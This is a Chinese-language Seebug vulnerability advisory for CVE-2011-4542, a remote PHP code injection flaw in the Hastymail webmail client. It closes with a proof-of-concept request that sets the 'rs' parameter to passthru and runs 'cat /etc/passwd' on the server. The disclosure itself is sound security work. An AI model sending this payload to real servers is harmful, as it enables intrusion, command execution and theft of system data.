Lucene search

K
seebugRootSSV:24260
HistoryNov 28, 2011 - 12:00 a.m.

Hastymail "rs"和"rsargs[]"参数远程代码注入漏洞

2011-11-2800:00:00
Root
www.seebug.org
14

0.76 High

EPSS

Percentile

98.2%

BUGTRAQ ID: 50794
CVE ID: CVE-2011-4542

Hastymail是一个用PHP编写的快速、安全、兼容RFC、跨平台的IMAP/SMTP客户端应用程序。

Hastymail实现上存在输入验证漏洞,篡改后的$_POST[‘rs’]和$_POST[‘rsargs[]’]输入参数没有被正确检查过滤,攻击者可利用这些漏洞注入和执行任意代码,导致Web服务器执行任意PHP代码、泄露敏感信息、删除任意文件。

Hastymail
厂商补丁:

Hastymail

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://hastymail.sourceforge.net/index.php


                                                GET: http://<app_base>/?page=mailbox&mailbox=Drafts
POST: rs=passthru&rsargs[]=asd&rsargs[]=cat /etc/passwd